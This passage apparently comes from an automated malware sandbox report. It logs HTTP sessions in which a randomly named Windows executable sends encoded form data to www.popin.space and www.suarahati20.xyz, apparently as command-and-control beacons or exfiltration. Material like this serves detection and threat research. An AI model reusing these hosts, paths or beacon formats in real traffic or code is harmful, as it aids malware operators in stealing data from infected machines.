                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 66 30 37 42 65 51 2f 36 46 2f 34 79 73 54 2f 63 30 56 6f 6c 37 72 68 53 6a 48 30 30 56 6c 6d 34 42 6e 37 36 56 54 36 6a 7a 52 53 4a 72 50 49 59 4e 4a 75 73 79 4e 4e 67 6b 59 68 34 4e 53 51 59 4c 6c 37 6b 37 31 78 70 38 6d 50 75 54 6d 53 6a 4e 37 52 55 56 51 72 53 48 59 77 79 42 58 30 2b 45 63 52 4c 4e 54 73 4c 33 7a 53 66 68 37 35 63 32 58 7a 63 41 4c 62 31 6f 5a 44 34 51 50 50 33 48 4b 77 41 51 47 41 76 79 75 6c 47 6c 58 4b 44 33 58 63 30 58 71 48 6f 30 48 50 62 53 44 33 67 68 70 70 2f 72 33 77 31 49 69 63 32 50 79 52 34 36 72 65 73 56 4a 51 67 42 4e 6a 4c 5a 6f 4c 78 31 43 50 6a 4e 69 6e 57 4b 32 2f 6f 73 49 61 30 6e 71 41 77 2b 39 59 37 62 65 2f 47 6d 79 44 69 68 65 6e 36 79 44 4a 78 5a 59 55 68 44 53 2b 62 35 52 67 4f 50 6f 36 7a 73 48 51 4e 39 2f 71 68 4a 59 4d 54 7a 55 33 38 36 51 2b 5a 52 58 59 4b 78 4f 51 52 6b 54 6d 34 4d 58 6a 72 6c 53 57 4d 68 61 62 70 50 50 4f 44 41 6f 6f 54 63 6f 36 65 73 44 74 33 38 50 56 71 52 79 4b 6c 39 71 73 68 66 52 71 68 77 71 74 30 65 63 46 75 31 [TRUNCATED]
                                                    Data Ascii: L4Ml=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRSJrPIYNJusyNNgkYh4NSQYLl7k71xp8mPuTmSjN7RUVQrSHYwyBX0+EcRLNTsL3zSfh75c2XzcALb1oZD4QPP3HKwAQGAvyulGlXKD3Xc0XqHo0HPbSD3ghpp/r3w1Iic2PyR46resVJQgBNjLZoLx1CPjNinWK2/osIa0nqAw+9Y7be/GmyDihen6yDJxZYUhDS+b5RgOPo6zsHQN9/qhJYMTzU386Q+ZRXYKxOQRkTm4MXjrlSWMhabpPPODAooTco6esDt38PVqRyKl9qshfRqhwqt0ecFu17nKkVuZVmCX1tIZUcicr+5/gZpJ9ZYIlWMhKo7kFpRdJ80Ue2opAKceswW0mY0jJr3Zu142ier+FbqgFYgd106OG+36j8PG9BovMlQcEQu633gY39W6lc/d++xE5E0jeiSqbPunilDFMOd/nGDGnUqfgkI9Thae+sOsF09ckQJIqP2DVp0mIykkFmwLU7rWODICAY0fDLKaRd5sroOQlquwGoHtDAxVyx9BDugoR/AEgh/5D0LsRDOsxScz25LyEZRvItPDIysEai/AcEUPT3aRX73F0hs3+QtiD5ECY+ERiFNlXFmBQ6DBpyDWExDD6nXe0X9IL0ETZMGXpP1bF20fHczhp6qm7WMciIVyYckEW0sIZ5WohrSnChvTx2mr4Z4vP45RlPBoaLAlYIdQM9pJdchu5MDaYLbl1uz/FrSLuk6E4FZawYuF2cVEaZFoWXILJKmhorgtwFWvfOdWpjmZIMy3+ozQ6iVdM3wzAtnwjnG/+zY8VKehKevQx427OWnCVAzPJaxLmDRKRhXfgIgAyimuy9FAUbZnalEDob8JUItplaOVQrr+ys3g1S8lGU9Foy98ZjpsfNSsIjQjnHH985o7xAiZhIqtwOQ25qnQjh+hoGOz/iE1SgZOooewIa4vtEX72bXxi/NpA/exYDWb5G8G46m1mYw [TRUNCATED]
                                                    Sep 24, 2024 17:17:40.662367105 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:39 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: d970db4c-46f4-4320-8e90-9392bdbc4515
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=d970db4c-46f4-4320-8e90-9392bdbc4515; expires=Tue, 24 Sep 2024 15:32:40 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6e 6b 45 65 79 57 74 59 38 67 67 59 56 72 30 4c 50 61 34 6f 77 74 32 67 61 61 38 55 36 32 69 76 62 7a 45 59 35 4f 31 4b 4d 39 63 32 2f 32 39 49 57 33 57 50 57 53 4f 42 36 42 49 76 36 4a 74 6d 6f 39 63 65 36 75 66 77 2b 46 50 62 67 2f 2f 74 48 6c 6d 48 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:40.663424015 CEST563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDk3MGRiNGMtNDZmNC00MzIwLThlOTAtOTM5MmJkYmM0NTE1IiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.863693199.59.243.227806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:42.695302010 CEST458OUTGET /x7gz/?VX=XZGx-&L4Ml=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.popin.space
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:43.190362930 CEST1236INHTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:42 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1466
                                                    x-request-id: 0476bd6b-8db3-4922-916e-d6ad22f4d4cf
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E6IJMFHMuG7EMQj4Tz+0f+kQ5TM8YLEx4lyS/lQDmfvaPFJX3orONoWcc20GfGn0YiuWTRAfZqEDrEgpYf+u1w==
                                                    set-cookie: parking_session=0476bd6b-8db3-4922-916e-d6ad22f4d4cf; expires=Tue, 24 Sep 2024 15:32:43 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 36 49 4a 4d 46 48 4d 75 47 37 45 4d 51 6a 34 54 7a 2b 30 66 2b 6b 51 35 54 4d 38 59 4c 45 78 34 6c 79 53 2f 6c 51 44 6d 66 76 61 50 46 4a 58 33 6f 72 4f 4e 6f 57 63 63 32 30 47 66 47 6e 30 59 69 75 57 54 52 41 66 5a 71 45 44 72 45 67 70 59 66 2b 75 31 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E6IJMFHMuG7EMQj4Tz+0f+kQ5TM8YLEx4lyS/lQDmfvaPFJX3orONoWcc20GfGn0YiuWTRAfZqEDrEgpYf+u1w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:43.191807032 CEST919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDQ3NmJkNmItOGRiMy00OTIyLTkxNmUtZDZhZDIyZjRkNGNmIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.863697198.252.106.191806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:48.640113115 CEST731OUTPOST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 59 48 45 2f 77 4a 2f 78 62 77 75 72 34 6b 31 38 78 56 56 36 42 66 65 47 62 77 76 56 65 39 59 4e 6d 4a 71 42 69 45 4c 61 62 56 6c 47 43 4e 4d 56 59 71 5a 69 4c 73 43 2b 6c 70 31 4f 51 39 54 54 68 46 71 75 75 64 59 72 43 43 51 78 6c 64 65 45 56 79 58 51 4f 61 4d 6e 68 43 44 5a 42 78 31 55 48 4f 79 46 6b 4f 30 63 77 4f 77 72 55 6c 41 54 59 30 62 66 53 39 52 68 56 36 67 6f 48 54 2f 33 58 2b 67 39 6d 79 52 58 74 55 54 50 75 5a 62 54 33 5a 54 6a 61 68 66 75 46 70 67 63 77 68 30 5a 75 41 55 5a 36 54 34 6a 53 65 41 31 52 74 47 79 47 58 50 50 46 72 52 62 6c 51 41 3d
                                                    Data Ascii: L4Ml=PM5d+u7O9BccYHE/wJ/xbwur4k18xVV6BfeGbwvVe9YNmJqBiELabVlGCNMVYqZiLsC+lp1OQ9TThFquudYrCCQxldeEVyXQOaMnhCDZBx1UHOyFkO0cwOwrUlATY0bfS9RhV6goHT/3X+g9myRXtUTPuZbT3ZTjahfuFpgcwh0ZuAUZ6T4jSeA1RtGyGXPPFrRblQA=
                                                    Sep 24, 2024 17:17:49.272085905 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:49 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.863698198.252.106.191806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:51.177927017 CEST751OUTPOST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 43 6d 30 2f 32 75 54 78 64 51 75 71 7a 45 31 38 6d 46 56 6d 42 66 43 47 62 77 48 46 66 4f 38 4e 6d 6f 61 42 6c 41 66 61 58 31 6c 47 4e 74 4d 51 63 71 5a 6c 4c 73 48 65 6c 70 4a 4f 51 39 58 54 68 41 57 75 76 71 30 30 45 43 51 7a 38 4e 65 61 57 43 58 51 4f 61 4d 6e 68 42 2b 32 42 31 5a 55 45 37 36 46 6b 76 30 44 76 2b 77 73 63 46 41 54 53 55 61 57 53 39 52 54 56 37 39 7a 48 56 6a 33 58 38 34 39 6d 6a 52 59 6b 55 54 4a 78 4a 61 63 32 5a 6d 66 41 47 6e 49 43 70 6f 49 34 48 6f 55 69 57 35 7a 67 78 77 6c 52 65 6f 65 52 75 75 45 44 67 53 6e 66 49 42 72 37 48 55 78 71 5a 55 47 62 34 69 62 54 75 37 54 65 78 6e 5a 33 2b 44 4f
                                                    Data Ascii: L4Ml=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO8NmoaBlAfaX1lGNtMQcqZlLsHelpJOQ9XThAWuvq00ECQz8NeaWCXQOaMnhB+2B1ZUE76Fkv0Dv+wscFATSUaWS9RTV79zHVj3X849mjRYkUTJxJac2ZmfAGnICpoI4HoUiW5zgxwlReoeRuuEDgSnfIBr7HUxqZUGb4ibTu7TexnZ3+DO
                                                    Sep 24, 2024 17:17:51.768738031 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:51 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.863699198.252.106.191806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:17:53.726007938 CEST1768OUTPOST /tuad/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.suarahati20.xyz
                                                    Origin: http://www.suarahati20.xyz
                                                    Referer: http://www.suarahati20.xyz/tuad/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 50 4d 35 64 2b 75 37 4f 39 42 63 63 43 6d 30 2f 32 75 54 78 64 51 75 71 7a 45 31 38 6d 46 56 6d 42 66 43 47 62 77 48 46 66 4f 30 4e 6d 65 75 42 6a 68 66 61 57 31 6c 47 41 4e 4d 52 63 71 5a 34 4c 73 2f 42 6c 70 46 34 51 2f 66 54 6a 69 75 75 6d 2b 67 30 52 79 51 7a 68 64 65 62 56 79 58 42 4f 62 38 6a 68 43 47 32 42 31 5a 55 45 36 4b 46 30 75 30 44 70 2b 77 72 55 6c 41 58 59 30 61 2b 53 35 30 6d 56 34 51 47 45 6a 54 33 58 63 6f 39 6b 52 35 59 72 55 54 4c 79 4a 62 44 32 5a 36 36 41 47 54 75 43 6f 73 69 34 41 45 55 68 68 4d 75 39 53 4a 37 45 50 67 38 4b 65 53 4f 61 6a 6a 43 65 72 52 2f 6e 51 77 7a 38 63 64 74 61 70 6d 68 58 6f 4c 47 42 55 37 32 33 37 69 36 42 5a 53 61 2b 65 61 67 67 58 30 76 69 78 54 2f 4e 6d 55 6d 44 42 4e 44 31 41 57 71 71 4f 46 78 46 68 34 72 71 34 51 35 2b 54 6d 52 53 74 78 7a 6b 33 4d 61 58 36 54 76 54 52 54 50 38 32 35 75 52 4d 37 66 37 46 4c 4d 48 55 67 54 48 5a 6d 78 6d 4d 70 7a 4c 68 76 37 55 71 30 43 34 62 2f 41 47 64 6c 41 31 4f 65 4f 49 6b 69 38 57 70 48 72 74 [TRUNCATED]
                                                    Data Ascii: L4Ml=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO0NmeuBjhfaW1lGANMRcqZ4Ls/BlpF4Q/fTjiuum+g0RyQzhdebVyXBOb8jhCG2B1ZUE6KF0u0Dp+wrUlAXY0a+S50mV4QGEjT3Xco9kR5YrUTLyJbD2Z66AGTuCosi4AEUhhMu9SJ7EPg8KeSOajjCerR/nQwz8cdtapmhXoLGBU7237i6BZSa+eaggX0vixT/NmUmDBND1AWqqOFxFh4rq4Q5+TmRStxzk3MaX6TvTRTP825uRM7f7FLMHUgTHZmxmMpzLhv7Uq0C4b/AGdlA1OeOIki8WpHrtE5Kq6r0qvlpyQoyLO4lccrTVYUmnOGvGq37OAWgQ3LoFJdi4ZEhW7zrkL+/mL6o63+nqVNQTEwTgU27DFiBgpYQqxTbxBAA7aUldbiSE/M073GadDeVkyZFG7pPie4TD3l50+VoVHBJ9aWdyKKgqR1fxzo1BEJzq2MxCuLEqNEjNw2YTniOLtzBZV0ZBm6bhxNtUVeerAPqvobcY92Ld4ID4bXH/eIB/IGwdSnMgcuu1hM8P1aWllCpyygILMi9fIJvOrQ/ScoWUijDRtPRjpuBORghkPnIIc+tIf0fmJraCmLulGTnVkF3i+wUZskSAnBFiTXSEbf7P6jede9UzsgKKFyoIjpT6s7L5TSsl8F02HKj2wWaqWJ4MDEWv/OFaO2LL60YUiO9zBLGPy7UAZ2dW/oiC9aI521Nx/F+fINtltSgLLt9qIx21Yc7lp5o957OPj21TUiG4vEvFEPSz+Q4IXpv7Rwq1UA7TMZGttRu5En2BPgDrHOsCYmEzs5xmchxWVCkeugHzrL9iM5CbdpNiRrqEd7bBjcrzDjHZ9jPjllmdPnA52jxAXkhoTMU4Bzc/qxh6OqVLT2L1+eRQQt+Iq36dwrdoBY7fWwoXJ0OSAmkL9t39VJeoQj9TGg84tN+uaLS4uBKFS2rRNpiZY6CncBOs1yEuuN [TRUNCATED]
                                                    Sep 24, 2024 17:17:54.327126026 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Tue, 24 Sep 2024 15:17:54 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 